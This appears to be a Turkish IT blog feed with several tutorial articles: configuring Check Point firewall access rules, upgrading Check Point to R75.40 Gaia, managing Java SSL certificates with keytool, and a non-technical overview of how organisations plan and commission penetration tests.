Check Point Security Gateway’in de ,SmartDashboard üzerinde yer aldığını görüyoruz. Bu aşamadan sonra Access Rule (erişim kuralı) oluşturmaya başlayabiliriz, ancak öncelikle kural oluşturma ile ilgili bazı bilgiler vermek istiyorum.

 

 

image044

 

 

Check Point Firewall konfigürasyonunda öncelikle erişim kuralı (Access Rule) kavramının bilinmesi gerekir. Access Rule, Check Point Firewall konfigürasyonu sırasında belirtilen kurallardan her birine verilen addır. Bütün IP trafiğine uygulamak üzere ya da belli bir protokol kümesine uygulamak üzere Access Rule oluşturulabilir.

 

Access rule elemanları, belirli access rule’ları yaratabilmek için kullanabileceğimiz yapılandırma nesneleridir. Örneğin yalnızca HTTP trafiğine izin verecek bir access rule yaratılabiliriz.

 

Bazı şirketler, belli kullanıcı ve grupların internet erişimini kısıtlamak isterler. Bunu aktifleştirmek için kural içinde bir network ya da host yaratıp,ardından bu elemanı bir access rule’da, yalnızca belirli subnetteki bilgisayarlar ya da kullanıcılar için internet erişimini kısıtlamak amacıyla kullanılabiliriz.

 

Bir Access Rule yaratmak için Access rule bileşenlerinin bilinmesi gerekmektedir.

 

Bir Access Rule şunlardan oluşur.

 

·         Name (adı)

·         Source (Kaynak)

·         Destination (Hedef)

·         Services (Protokoller)

·         Action (Accept-Drop-Reject)

·         Track

·         Time

 

 

 

 

image045

 

 

 

Name : Her Access Rule’ın bir adı vardır. Yapılan değişikliğe ilişkin bir isim olması o kural hakkında bilgi sahibi olunması açısından yararlı olur.

 

Source ve Destination : Kaynak ve hedef network. Access Rule’un hangi network’ler arasında geçerli olacağı belirtilir.

 

Services : Uygulanacak Access Rule’un hangi Protokoller için geçerli olacağının tanımlandığı bölümdür.

 

Action : Kuralın izin vereceği accept) ya da bloklayacağı (drop) şeyler bu bölümde belirlenir.

 

Firewall üzerinde erişim kurallarının değerlendirilmesine en üst sıradaki kuraldan başlanır. Accept ve Drop olarak başlayan kural tanımları firewall üzerinden geçişi tanımlar. Herhangi bir kurala bağlı olarak geçiş yapamayan network trafiği, en altta (varsayım) duran Drop kuralı ile engellenir.

 

Drop ve Reject seçeneklerinin farkı konusunda şu temel bilgiyi de vereyim:

 

DROP paket engellenir ve paketi gönderen kişinin gönderdiği paketin engellendiğinden haberi olmaz, REJECT ise paketi engeller fakat paketi gönderen kişiye paketin gönderilmediğini bildirir.

 

Firewall’lar Üzerinde Kural Oluştururken Dikkat Edilmesi Gereken Genel sıralama:

 

·         Deny kuralları

·         Spesifik kurallar

·         Genel kurallar

 

 

Bu durumda erişim kurallarını oluşturmak için şu şekilde bir sıralama izlenebilir:

 

1. Belli bilgisayarların ve kullanıcıların Internet erişimini engelleyen ya da kısıtlayan kurallar düzenlenir.

2. Sınırlı Internet erişimi için kural hazırlanır.

3. Bütün kullanıcıların Internet erişimi için kural hazırlanır.

 

Rule tanımlamadan bu kadar bahsettikten sonra Rule menüsünden Add Rule’u seçerek ilk kuralımızı tanımlayalım.

 

 

image046

 

 

Bir kural oluşturduktan sonra Policy menüsünden Install seçeneğini kullanmazsak kuralımız devreye girmeyecektir,bu yüzden bir kural oluşturduktan sonra mutkala kuralı Install etmeliyiz.

 

 

image047

 

 

image048

 

 

Policy başarılı bir şekilde kuruldu.

 

 

image049

 

 

Kuralların oluşturulması, host, network tanımlamaları, port ve protokol tanımlamaları gibi işlemlerle ilgili çok fazla doküman olduğu için makalede bu konulardan bahsetmedim.

 

Umarım yararlı olmuştur.

Check Point R75.20 den R75.40 Gaia ya Upgrade

$
0
0

Bir önceki makalemizde Check Point Gaia kurulumundan bahsetmiştik. Peki elimizde R75,R75.20,R75.30 versiyonlar var ve biz Gaia’ya upgrade gerçekleştirmek istiyoruz,bunun için neler yapmalıyız, hangi adımları izlemeliyiz, upgrade yöntemleri nelerdir gibi konular bu makalenin konusunu oluşturuyor.

 

Upgrade işlemine her zaman Security Management ile başlanmalıdır. Yani her zaman “Security Management Version >= Security Gateway Version” olmalıdır.

 

Check Point upgrade işlemini istersek Web arayüzünden (In Place Upgrade), istersek Central Upgrade (Upgrade paketi sadece Management’a yüklenir) aracılığıyla gerçekleştirebiliriz. Test ortamlarında bu işlemi gerçekleştirmek isteyenler, Web ara yüzünden upgrade işlemini 15 günlük deneme sürümü üzerinden gerçekleştirebilirler. Ancak Smart Update konsolu kullanarak bir ya da daha fazla Security Gateway’i upgrade etmek isteyenler ilgili ürün için geçerli bir Check Point lisansına sahip olmalıdır.

 

Bu makalede her iki yöntemle de upgrade işleminin nasıl gerçekleştirileceğinden bahsedeceğim.İlk olarak Web arayüzünü kullanarak upgrade işlemini gerçekleştireceğiz. Ancak Upgrade işlemine başlamadan önce Check Point Security Management ve Security Gateway üzerine lisans ekleme işlemlerini gerçekleştirelim, böylce Check Point üzerinde lisans ekleme işleminin nasıl yapılacağını da anlatmış olalım.

 

Check Point üzerinde lisans eklemek için kullanabileceğimiz 3 yöntem bulunmaktadır.

 

1. Smart Update aracılığı ile

2. Cpconfig menüsünden Add License seçeneğini kullanarak

3. Cplic Putlic ile

 

Biz cpconfig komutunu kullanarak lisans ekleme işlemini gerçekleştireceğiz.

 

Expert komutu ile expert moda geçiş yapıyoruz.

 

Expert modda iken lisans dosyamızın bulunduğu ftp server üzerine bağlanarak lisans dosyasını check point üzerine alacağız. (ftp server olarak filezilla,babyftp ya da winftp server'ı öneririm.) Ftp üzerinden Check Point Lisans dosyasını almak için expert modda ; ftp 192.168.1.35 (lisans dosyasının olduğu ftp server ip adresi ) yazarak lisans dosyasının bulunduğu ftp’ye bağlanıyoruz. FTP erişimi için gerekli kullanıcı adı ve parolayı giriyoruz.

 

 

image001

 

 

Get cplicense.lic (lisans dosyasının adı) komutu ile lisans dosyasını check point üzerine aktarıyoruz.

 

 

image002

 

 

Cpconfig komutu ile Check Point Configuraton menüsüne ulaşıyoruz ve Licenses and contracts seçeneği için 1'e basıyoruz.

 

 

image003

 

 

İlk olarak Manage Licenses seçeneğini ardından lisans eklemek istediğimizi ve son olarak da lisansı bir dosyadan yüklemek istediğimizi belirten Fetch seçeneğiyle devam edip lisans dosyasının adını yazıp entera diyerek Check Point üzerine lisansımızı yüklemiş oluyoruz.

 

Lisans yükleme işlemini de tamamladığımıza göre upgrade öncesi Smart Dashboard’a bağlanıp R75.20 konsolunu ve var olan kurallarımızı görüntüleyelim.

 

 

image004

 

 

Şimdi de Security Management ürününün Web ara yüzünde login olup, Device bölümünden Upgrade seçeneğini tıklayalım. Upgrade Steps kısmının altında yer alan Browse seçeneği ile Check Point Gaia upgrade paketinin bulunduğu DVD sürücüsünü ya da lokasyonu gösteriyoruz.

 

 

 

image005

 

 

Upgrade paketinin yüklenmesinin biraz zaman alabileceğini, devam etmek isteyip istemediğimizi soruyor. Tabii ki de devam ediyoruz.

 

 

image006

 

 

Upgrad dosyası başarılı bir şekilde yüklendikten sonra Start Upgrade butonu ile upgrade işlemini başlatıyoruz. (Upgrade paketi /var/suroot altına yüklenir.)

 

 

image007

 

 

Upgrade işlemi tamamlandıktan sonra Security Management yeniden başlatılıyor ve herhangi bir sorun çıkmadığı takdirde Security Management ürünümüzün Upgrade işlemi tamamlanıyor.

 

 

image008

 

 

Security Management üzerinde login olduktan sonra upgrade işleminin gerçekleştiğini görmek için fw ver komutunu çalıştırıyoruz.

 

 

image009

 

 

Security Management upgrade işlemi tamamlandı ancak Smart Dashboard bağlantısı sağlamak için Smart Console uygulamasının da yeni versiyonunu yüklememiz gerekiyor. Bunun için Security Management ürününün Web arayüzünden login olup Smart Console’u indiriyoruz.

 

 

image010

 

 

image011

 

 

SmartConsole kurulumunu gerçekleştirdikten sonra Check Point Security Management ürününe bağlandığımızda artık R75.40 Gaia üzerinde olduğumuzu ve objelerimizin, kurallarımızın eksiksiz bir biçimde karşımızda olduğunu görüyoruz.

 

 

image012

 

 

Web arayüzünden Security Management upgrade’ini gerçekleştirdikten sonra Security Gateway’lerimden bir tanesini de Smart Update aracılığı ile upgrade ederek , Central Upgrade işleminin nasıl gerçekleştirileceğinden de bahsetmiş olmak istiyorum.

 

Smart Update konsolu ile Central Management

 

Central Upgrade işlemi için Upgrade paketini Smart Update üzerine yüklememiz gerekiyor. Dolayısıyla Smart Update uygulamasını (Smart Dashboard=>Window=>Smart Update)açtıktan sonra Packages menüsünden Add seçeneğini ve From File’ı tıklayıp, upgrade dosyasının bulunduğu yeri gösteriyorum.

 

 

image013

 

 

image014

 

 

Paketimizin Repository’e başarılı bir şekilde yüklendiğini görüyoruz. Bu arada Packages Management konsolunda gördüğünüz gibi Security Management ve Security Gateway (cpsg) ürünlerimde işletim sistemi olarak Gaia, Security Gateway’lerden biri olan (cpsg2) üzerinde ise Secure Platform R75.20 yüklenmiş durumda.

 

 

image015

 

 

Upgrade işlemini gerçekleştirmek istediğimiz Security Gateway (cpsg2) üzerinde sağ tıklayıp Upgrade all Packages’i seçiyoruz.

 

 

image016

 

 

image017

 

 

Upgrade butonu ile devam etmeden önce buradaki seçenekleri kısaca açıklayalım.

 

Distribute and Upgrade packages : Upgrade işleminin gerçekleştirileceği ürün üzerine gönderilip ardından da upgrade işleminin gerçekleştirilmesini sağlar.

 

Only Distribute packages (upgrade later) : Upgrade işleminin gerçekleştirileceği ürünün üzerine gönderilidiği fakat upgrade işleminin gerçekleştirilmediği seçenektir.

 

Upgrade using previously distributed packages : Daha önceden dağıtılmış bir upgrade paketinin kurulumunun gerçekleştirilmesini sağlar.

 

 

image018

 

 

Paketin gönderilmeye başladığını görüyoruz.

 

 

image019

 

 

Paketin dağıtımı ve kurulumu tamamlandıktan sonra sistem yeniden başlatılıyor.

 

 

image020

 

 

Ve Smart Update aracılığı ile upgrade başarılı bir şekilde tamamlandı.

 

 

image021

 

 

Umarım yararlı olmuştur.

Java Uygulamalarında SSL Sertifika Yönetimi

$
0
0

En değerli varlığımız olan verinin güvenli yöntemlerle işlenmesini sağlamak dikkat etmemiz gereken en önemli noktalardan biridir. Çoğu kurumda, veritabanlarında depolanan bilgiye erişim uygulama sunucuları üzerinde çalışan uygulamalar üzerinden yapılmaktadır.

 

 

Bu makalemizde, Java tabanlı uygulamalarda kullanılan SSL Sertifikaların yönetilmesinden bahsedeceğiz. Öncelikle, ssl sertifikalar ile ilgili temel kavramları açıklayarak başlayalım:

 

Bu ve benzeri tüm tanımlar için ÇözümPark Bilişim Sözlüğünü Kullanabilirsiniz.

 

http://sozluk.cozumpark.com

 

 

 

CA – Certification Authority : Sertifika Otoritesi, sertifika vermeye yetkili kurum

 

 

RA – Registration Authority:  Sertifika talebinde bulunan kişi/kurumun kimlik bilgilerini doğrulayan yerel kurum

 

CRL - Certificate Revocation List: Sertifikaların geçerlilik sürelerinin takip edildiği liste

 

 

Private Key: Kişiye/Kuruma özel, kesinlikle başkalarıyla paylaşılmaması gereken şifreleme anahtarı

 

 

Public Key: Kişiye/Kuruma özel, başkalarının da erişebildiği şifreleme anahtarı

 

 

Sertifika: Public Key + Dijital İmza

 

 

Root ve Intermediate Sertifikalar: Kişi/kurum sertifikasını doğrulamak için kullanılan CA sertifikaları

 

 

Dijital İmza: Sertifika talebinde bulunan kişi/kurumun Public Key Hashi’nin CA’in Private Keyi ile şifrelenmesi (imzalanması) işlemi.

 

 

CSR – Certificate Signing Request: Private kullanılarak oluşturulacak public key’in CA tarafından imzalanması için gönderilen sertifika imzalama isteği (*.csr)

 

 

KeyStore: Private key ve sertifikaları içeren Java’ya özel dosya (*.jks)

 

 

TrustStore: Kişi/kurum sertifikalarını doğrulamak için kullanılacak genellikle CA’in root ve intermediate sertifikalarını içeren Java’ya özel dosya(*.jks) .(Internal root CA sertifikalarını da içerebilir)

 

 

 

Java uygulama kodunda kullanılacak SSL sertifikalar, Keystore (*.jks) adı verilen dosyalarda tutulur. Bu sertifikaları doğrulamak için kullanılan CA’in root ve intermediate sertifikalarının uygulama sunucusunda (AS – Application Server) olması gerekir. Bunun için iki yöntem vardır;

 

 

 

  1. Manuel olarak oluşturacağımız TrustStore’da
  2. Uygulama sunucusunun Default Trustore’unda

 

 

 

Bu makalede, (a.) yöntemi seçilmiştir. Java uygulama kodunda, kullanacağımız sertifikanın KeyStore’da, sertifikamızı doğrulamak için kullanılacak CA root ve intermediate sertifikalarının da manuel yarattığımız TrustStore içinde olduğunu belirteceğiz. (Bknz “İlgili Kod Parçacığı” bölümü).

 

 

 

(b.) yöntemi kullanıldığında, CA’in root ve intermediate sertifikaların uygulama sunucusu yönetim ara yüzünden Default TrustStore’a yüklenmesi gerekir.

 

 

Gerçekleştireceğimiz işlemler:

 

 

 

1.)    Keystore ve keystore içinde bir Private Key oluşturulması

2.)    Private key kullanılarak CSR oluşturulması, CSR’ın kontrol edilmesi ve imzalanmak üzere CA’ya gönderilmesi

3.)    CA’dan gelen sertifikanın Keystore import edilmesi

4.)    CA’in root ve intermediate sertifikalarının import edilmesi için TrustStore oluşturulması ve CA sertifikalarının import edilmesi (sertifikamız bu CA sertifikaları ile doğrulanır)

5.)    TrustStore içindeki kullanılmayacak private key’in silinmesi

6.)    Store içindeki nesneleri export edilmesi

7.)    Java kod parçacığı ve/veya uygulama sunucusu üzerinde yapılması gereken değişiklikler

 

 

 

Java SSL Sertifika işlemleri için “keytool” uygulamasını kullanıyoruz. Varsayılan olarak aşağıdaki path’de olan uygulamayı (işletim sistemine ve kurulum ayarlarınıza göre değişebilir), işletim sisteminizde path variable olarak eklerseniz istediğiniz dizinde bu işlemleri gerçekleştirebilirsiniz.

 

 

 

C:\Program Files\Java\jre6\bin

 

 

 

Store içindeki nesnelere erişim “alias” adı verilen parametreler ile gerçekleştirilir.

 

 

1.)    JKS + Private Key Oluşturma

 

 

 

2048 bitlik, RSA algoritması kullanan, KeyStore şifresi “ikaru55@”, Private key şifresi “5uraki@”, Common Name: Elma olan Makale.jks keystore’u oluşturmak için aşağıdaki komutu kullanıyoruz:

 

Burada, elma vb örnek olarak kullanılmıştır. Uygulama.kurum.com.tr vb olarak gerçek ortamlarda kullanılabilir.

 

 

 

keytool.exe -genkey -keystore "C:\Cagatay\Makale.jks" -alias Makale -storepass ikaru5@ -keypass 5uraki@ -keyalg RSA -keysize 2048 -dname "CN=Elma, OU=Bank AS, O=Cagatay"

 

 

 

image001

 

 

 

2.)    CSR oluşturma + Kontrol Etme + CA’ya gönderme

 

KeyStore içindeki Private Key’imizi kullanarak CA’ya sertifika imzalama isteği (makale.csr) gönderiyoruz. Aslında CA yerine, RA’ya gönderiyoruz. RA, bizim gerçekten o sertifikayı almaya yetkili olup olmadığımızı imza sirküleri, ticaret sicil gazetesi vb kontroller ile gerçekleştirir. Uygun bulunursa sertifikamız gönderilir.

 

 

keytool -certreq -alias Makale -file Makale.csr -keystore Makele.jks -storepass ikaru5@ -keypass 5uraki@

 

 

 

image002

 

 

 

Oluşturduğumuz CSR’ı kontrol etmek için metin editörü ile açıp http://www.sslshopper.com/csr-decoder.html linkindeki uygulamayı kullarak kontrol ediyoruz:

 

 

 

 

image003

 

 

 

 

 

 

image004

 

 

 

 

Doğrulama işlemi için internette farklı kaynaklar da mevcuttur.

 

3.)    CA’den Gelen Sertifikayı KeyStore’a Import Etme

 

 

Store içindeki key ve sertifikalara erişim “alias” kullanılarak gerçekleştirilir.

 

CA tarafından imzalanan sertifika (Makale_Sertifika.cer) tarafımıza ulaştığında, KeyStore’a import ediyoruz:

 

 

keytool –import –trustcacerts –alias Makale_Sertifika -file Makale_Sertifika.cer -keystore "C:\Cagatay\Makale.jks" -storepass ikaru5@

 

 

image005

 

 

 

image006

 

 

 

 

Sertifikamızla beraber, CA’in root ve intermediate sertifikalarını edinmemiz gerekir. Bu sertifikaları da makalemizin ilerleyen bölümlerinde TrustStore’a import edeceğiz. Sertifikamız, CA sertifikaları ile doğrulanacak. Makalemizde, CA olarak COMODO seçilmiştir.

 

 

 

image007

 

 

 

image008

 

 

 

 

CA’in Root ve Intermediate Sertifikaları:

 

 

comodo-root.cer ve comodo-intermediate.cer

 

 

image009

 

 

 

 

image010

 

 

 

Yüklü key ve sertifikaları listeleme

 

 

Sertifikamızı Makale.jks keystore’umuza import etmiştik. Şimdi, Makale.jks içeriğini cagatay.txt’ye yazdırıp kontrol edelim:

 

 

keytool -list -v -keystore Makale.jks -storepass ikaru5@ > cagatay.txt

 

 

Dosyaya yazdırmadığımız durumda (>cagatay.txt olmadan),  sonucu ekrana basacağından çok sayıda sertfika ve key olduğunda kontrol daha zor olacaktır.

 

 

image011

 

 

 

Alias=makale nesnesi, entry type değerinden de görüleceği üzere Privata Key’imiz, makale_sertifika ise CA’in (Comodo) imzaladığı sertifikamızdır.

 

 

4.)    TrustStore Oluşturarak CA Sertifikalarının Import Edilmesi

 

Sertifikamızı doğrulamak için kullanacağımız CA root ve intermediate sertifikalarını içeren TrustStore oluşturmak için aşağıdaki komutu kullanıyoruz:

 

 

keytool.exe -genkey -keystore "C:\Cagatay\TrustedMakale.jks" -alias TrustedMakale -storepass ikaru5@ -keypass 5uraki@ -keyalg RSA -keysize 2048 -dname "CN=Elma, OU=Bank AS, O=Cagatay"

 

 

 

image012

 

 

 

Root CA sertifikalarını TrustStore’a import etme

 

 

CA root ve intermediate sertifikalarını TrustStore’a import ediyoruz:

 

 

keytool –import –trustcacerts –alias comodo-root  -file comodo-root.cer -keystore "C:\Cagatay\TrustedMakale.jks" -storepass ikaru5@

 

 

 

image013

 

 

 

keytool –import –trustcacerts –alias comodo-intermediate -file comodo-intermediate.cer -keystore "C:\Cagatay\TrustedMakale.jks" -storepass ikaru5@

 

 

image014

 

 

 

Yüklü sertifikaları listeleme

 

 

TrustStore içeriğini kontrol ediyoruz:

 

 

keytool -list -v -keystore TrustedMakale.jks -storepass ikaru5@ > cagatayTrusted.txt

 

 

 

image015

 

 

 

image016

 

 

 

TrustStore içinde (trustedmakale.jks) üç nesne bulunuyor. Alias=Trustedmakale nesnesi örnek amaçlı yaratılmış private key. Kullanmayacağımız için silmemiz gerekiyor.

 

5.)    Private key’i silme

 

 

 

Alias=Trustedmakale private key nesnesini aşağıdaki komut ile siliyoruz:

 

 

keytool -delete -alias TrustedMakale -keystore Trustedmakale.jks -storepass ikaru5@

 

 

 

image017

 

 

 

İşlem sonrası TrustedMakale.jks içeriğine bakalım:

 

 

keytool -list -v -keystore TrustedMakale.jks -storepass ikaru5@ > cagatayTrusted.txt

 

 

 

image018

 

 

 

 

TrustStore oluştururken –genkey parametresini kullanmasaydık private key oluşturulmayacaktı. Jks içinden nesne silmeyi (alias kullanarak) göstermek için bu şekilde oluşturulmuştur.

 

 

Son Durum

 

 

image019

 

 

 

6.)    Store İçindeki Key/Certificate Nesnelerinin Export Edilmesi

 

 

Store içindeki key ve sertifikaları export etmek için –export switchini kullanabiliriz:

 

 

keytool -export -alias makale_sertifika -file makale_sertifika.cer -keystore Makale.jks -storepass ikaru5@

 

7.)    İlgili Kod Parçacığı

 

 

Artık, java uygulama kodumuz içinde aşağıdaki tanımlamaları yaparak uygulamamızın CA tarafından imzalanmış SSL sertifikası kullanmasını sağlayabiliriz.

 

 

 

props.setProperty("javax.net.ssl.keyStore"          , local path of jks file that holds private key);

props.setProperty("javax.net.ssl.keyStorePassword"   , private keystore file storepassword);

props.setProperty("javax.net.ssl.keyStoreType"       ,”JKS”);

 

props.setProperty("javax.net.ssl.trustStore"          , local path of jks file that holds private key);

props.setProperty("javax.net.ssl.trustStorePassword"   , private keystore file storepassword);

props.setProperty("javax.net.ssl.trustStoreType"       ,”JKS”);

 

 

 

Makalemizin başında belirttiğimiz gibi, TrustStore kullanmak zorunda değildik. Uygulama sunucusunun default TrustStore’una CA’in root ve intermediate sertifikalarını yönetim arayüzünden import edip java uygulama kodu içindeki trustStoreType içeren satırları silerek de kullanabilirdik. Her iki yöntemi de anlatmak için bu şekilde uyguladık.

Bilgi Güvenliğinde Sızma Testleri

$
0
0

 

 

Günümüz bilgi güvenliğini sağlamak için iki yaklaşım tercih edilmektedir .  Bunlardan ilki savunmacı yaklaşım(defensive) diğeri de proaktif yaklaşım (offensive)olarak bilinir. Bunlardan günümüzde kabul göreni proaktif yaklaşımdır. Pentest –sızma testleri– ve vulnerability assessment –zayıflık tarama- konusu proaktif güvenliğin en önemli bileşenlerinden biridir.

 

 

Son yıllarda gerek çeşitli standartlara uyumluluktan gerekse güvenliğe verilen önemin artmasından dolayı sızma testleri ve bu konuda çalışanlara önem ve talep artmıştır. Bu yazıda sızma testleri ile ilgili merak edilen sorulara sektörün gözünden cevap verilmeye çalışılacaktır. Yazı, sızma testleri konusunda teknik detaylar içermemektedir.  Sızma testleri konusunda teknik bilgiler için http://blog.bga.com.tr  adresi takip edilebilir.

 

 

Sızma Testleri Lüks İhtiyaç mı?

 

 

Sahip olduğunuz bilişim sistemlerindeki güvenlik zaafiyetlerinin üçüncü bir göz tarafından kontrol edilmesi ve raporlanması proaktif güvenliğin ilk adımlarındandır. Siz ne kadar güvenliğe dikkat ederseniz birşeylerin gözünüzden kaçma ihtimali vardır ve internette hackerlarin sayısı ve bilgi becerisi her zaman sizden iyidir. Hackerlara yem olmadan kendi güvenliğinizi bu konudaki uzmanlara (beyaz şapkalı hacker, ethical hacker, sızma test uzmanı vs) test ettirmek firmanın yararına olacaktır.

 

 

Sağlam bir ekibe yaptırılacak sızma testleri internet üzerinden gelebilecek tehditlerin büyük bir kısmını ortaya çıkarıp kapatılmasını sağlayacaktır.  Bununla birlikte bilişim güvenliğinin zamana bağımsız dinamik bir alan olduğu gözönünde bulundurulursa sızma testlerinin tek başına yeterli olmayacağı aşikardır.

 

 

Sızma testlerinini bitimini takip eden günlerde ortaya çıkabilecek kritik bir güvenlik zafiyeti kurumları zor durumda bırakmak için yeterlidir. Dolayısıyla sızma testleri ile yetinmeyerek mutlaka katmanlı güvenlik mimarisinin kurum güvenlik politikalarında yerini alması önerilmektedir.

 

 

Güvenlik açısından olduğu kadar çoğu kurum ve kuruluş için sızma testleri ISO 27001, PCI, HIPAA gibi standartlarla zorunlu hale getirilmiştir.


Sızma testleri maliyetli bir iştir ve genellikle yöneticiler tarafındans ROI(Return of investment)si hesaplanamayan ya da hatalı hesaplanan bir projedir. Burada iş bilgi güvenliği uzmanlarına düşmektedir. Gerçekleştirilen sızma testlerinin sonuçları yöneticilerin anlayacağı uygun bir biçimde üst yönetime anlatılmalı ve yapılan işin şirkete uzun vadeli kazandırdıkları gösterilmelidir. 

 

Kısaca sızma testleri konusunda uzman ekiplere sahip firmalara yaptırılırsa değerli bir iştir, bunun haricinde sadece vicdani rahatlık sağlar ve standartlara uyumluluk kontrol listelerinden bir madde daha tamamlanmış olur.

 

Sızma Testlerinde Genel Kavramlar

 

 

Pentest, Vulnerability Assessment ve Risk Asssessment Kavramları

 

 

Sızma Testleri (Pentest): Belirlenen bilişim sistemlerine mümkün olabilecek ve müşteri tarafından onayı verilmiş her yolun denenerek sızılmaya çalışma işlemine pentest denir.

 

 

Pentest de amaç güvenlik açıklığını bulmaktan öte bulunan açıklığı değerlendirip sistemlere yetkili erişimler elde etmek ve elde edilen erişimler kullanılarak tüm zafiyetlerin ortaya çıkarılmasıdır.

 

 

Sızma Test Çeşitleri

 

Gerçekleştirilme yöntemlerine göre sızma testleri üçe ayrılmaktadır. Bunlar aşağıdaki gibi listelenmektedir.

 

 

·         Whitebox

·         Blackbox

·         Graybox

 

 

Black box Pentest – Kapalı Kutu Sızma Testleri

 

Bunlardan blackbox bizim genelde bildiğimiz ve yaptırdığımız pentest yöntemidir. Bu yöntemde testleri gerçekleştiren firmayla herhangi bir bilgi paylaşılmaz. Firma ismi ve firmanın sahip olduğu domainler üzerinden firmaya ait sistemler belirlenerek çalışma yapılır.

 

 

White box Pentest – Açık Kutu Sızma Testleri

 

Bu sızma test yönteminde firma tüm bilgileri paylaşır ve olabildiğince sızma testi yapanlara bilgi verme konusunda yardımcı olur.

 

 

 

Zafiyet Değerlendirme Testleri (Vulnerability Assessment): Belirlenen sistemlerde güvenlik zaafiyetine sebep olabilecek açıklıkların araştırılması. Bu yöntem için genellikle otomatize araçlar kullanılır(Nmap, Nessus, Qualys vs)gibi. Vulnerability assessment çalışmaları sızma testleri kadar tecrübe zaman gerektirmeyen çalışmalardır.

 

 

Risk assessment tamamen farklı bir kavram olup pentest ve vuln. assessmenti kapsar. Zaman zaman technical risk assessment tanımı kullanılarak Vulnerability assessment kastedilir.

 

Sızma Testlerinde Proje Yönetimi

 

 

Gerçekleştirilecek sızma testlerinden en yüksek verimi alabilmek için her işte olduğu gibi burada da plan yapmak gerekir. Pentest planı oluşturmaya başlamak için aşağıdaki temel sorular yeterli olacaktır:

 

 

●     Pentest’in kapsamı ne olacak?

●     Sadece iç ağ sistemlerimimi, uygulamalarımı mı yoksa tüm altyapıyı mı test ettirmek istiyorum

●     Testleri kime yaptıracağım

●     Ne kadar sıklıkla yaptırmalıyım

●     Riskli sistem ve servisler kapsam dışı olmalı mı yoksa riski kabul edip sonucunu görmelimiyim.

●     DDOS denemesi yapılacak mı

●     Pentest sonuç raporundaki zafiyetleri kapatmak icin idari gücüm var mı?

 

 

 

image001

 

 

Müşteri İçin Pentest Proje Zaman Çizelgesi

 

 

1.      Pentest yapmak için karar verilir

2.      Temel kapsam belirlenir. Hangi bileşenlerin test edileceği konusunda Kapsam Belirleme kısmı yardımcı olacaktır.

3.      Firma araştırması [Firma seçimi konusunda dikkat edilmesi gereken maddeler incelenmeli]

4.      Firmalardan teklif toplama

5.      Firmalardan kapsam önerilerini isteme

6.      Firmalardan örnek sızma test raporu isteme

7.      Gerekli durumda kapsam belirleme için firmayla ek toplantılar

8.      Firmaya karar verme ve sızma testlerine başlama

 

Sızma Testlerinde Kapsam Belirleme Çalışması

 

Sızma testinde ana amaçlardan biri tüm zafiyetlerin degerlendirilerek sisteme sızılmaya çalışılmasıdır. Bu amaç doğrultusunda gerçekleştirilecek sızma testlerinde kapsam pentest çalışmasının en önemli adımını oluşturmaktadır.

 

 

Sistem/ağ yöneticileri ile hackerların bakış açısı farklıdır ve sitem/ağ yöneticisi tarafından riskli görülmeyen bir sunucu/sistem hacker için sisteme sızmanın ilk adımı olabilir. Bu nedenle kapsam çalışmalarında mutlaka pentest yaptırılacak kişi/firma ile ortaklaşa hareket edilmelidir.

 

Aşağıdaki resim kapsam konusunun önemimi çok iyi göstermektedir.

 

 

 

image002 

 

 

 

Kapsam belirlemek için standart bir formül yoktur. Her firma ve ortam için farklı olabilmektedir. Genellikle sızma testleri aşağıdaki gibi alt bileşenlere ayrılmaktadır.

 

 

●     Web uygulama sızma testleri

●     Son kullanıcı ve sosyal mühendislik testleri

●     DDoS ve performans testleri

●     Ağ altyapısı sızma testleri

●     Yerel ağ sızma testleri

●     Mobil uygulama güvenlik testleri

●     Sanallaştırma sistemleri sızma testleri

 

 

 

Kapsam belirleme konusunda sızma testini gerçekleştirecek firma ve hizmeti alacak firma birlikte karar vermelidir. Genellikle hizmet alan firma maliyetleri düşürmek için kapsamı olabildiğince daraltmaya çalışmakta ve kapsam olarak güvenli olduğu düşünülen sistemlerin ip adresleri verilmekte ya da örnekleme yapılmaya çalışılmaktadır. Oysa sızma testlerinde ana amaçlardan birisi en zayıf noktayı kullanarak sisteme sızmak, sızılabildiğini göstermektir.

 

 

Kapsam konusunda sadece ip adresi alarak sızma testi yapılmaz. Bir web uygulamasını test etmek ile DNS sunucuyu, güvenlik duvarını test etmek çok farklıdır. Yine statik içerik barındıran bir web sitesi ile dinamik içerik barındıran web sayfasını test etmek de içerik ve üzerine harcanan emek açısından oldukça farklıdır.

 

 

Firma Seçimi

 

Sızma testleri sonuçları somut olmayan hizmetler kapsamındadır. Firmalar kendilerinin uzman olduklarını farklı şekilde ortaya koyabilirler. Bunlardan en önemlisi firmanın referansları ve bu

konuda çalıştırdığı kişilerin yetkinliği ve firmanın sızma testlerine olan ilgisidir. Güvenlik ürün çözümleri sunup yanında sızma testleri yapan firmalar genellikle halihazırda sundukları ürünleri satabilmek için sızma testleri gerçekleştirir ve sonuçları daha çok ürün satmaya yönelik olur.

 

 

Tek işi sızma testleri ve benzeri hizmetler vermek olan firmalar bu konuda daha öncelikli olarak değerlendirilmelidir.

 

 

Firma seçimi konusunda yardımcı olabilecek bazı maddeler aşağıdaki gibi sıralanabilir.

 

 

·         Firmada test yapacak çalışanların CVlerini isteyin . Varsa testi yapacak çalışanların konu ile ilgili sertifikasyonlara sahip olmasını ercih edin.

·         Testi yapacak çalışanların ilgili firmanın elemanı olmasına dikkat edin.

·         Firmaya daha önceki referanslarını sorun ve bunlardan birkaçına memnuniyetlerini sorun.

·         Mümkünse firma seçimi öncesinde teknik kapasiteyi belirlemek için tuzak sistemler kurarak firmaların bu sistemlere saldırması ve sizin de bildiğiniz açıklığı bulmalarını isteyin.

·         Firmadan daha önce yaptığı testlerle ilgili örnek raporlar isteyin.

·         Testlerin belirli ip adreslerinden yapılmasını ve bu ip adreslerinin size bildirilmesini talep edin.

·         Firmaya test için kullandıkları standartları sorun.

·         Firmanın test raporunda kullandığı tüm araçları da yazmasını isteyin.

·         Pentest teklifinin diğerlerine göre çok düşük olmaması

 

 

En önemli maddelerden biri Penetration test firmanın özel işi mi yoksa oylesine yaptığı bir iş mi? Bu sorgu size firmanın konu hakkında yetkinliğine dair ipuçları verecektir.

 

 

Ücretiz sızma testi hizmeti veren firmalar genellikle sızma testi konusunu yan iş olarak yapmaktadır ve bu konuda alınacak hizmetin kalitesi sıfıra yakın olacaktır. Sızma testleri tamamen uzmanlık alanı bu olan kişi/firmalara bırakılmalıdır.

 

 

Genellikle ürün satmak için ücretsiz sızma testleri gerçekleştiren firmaların yapacağı sızma testleri otomatik araçlarla taramanın ötesine geçememektedir.

 

 

 

Sızma Test Metodolojisi Kullanımı

 

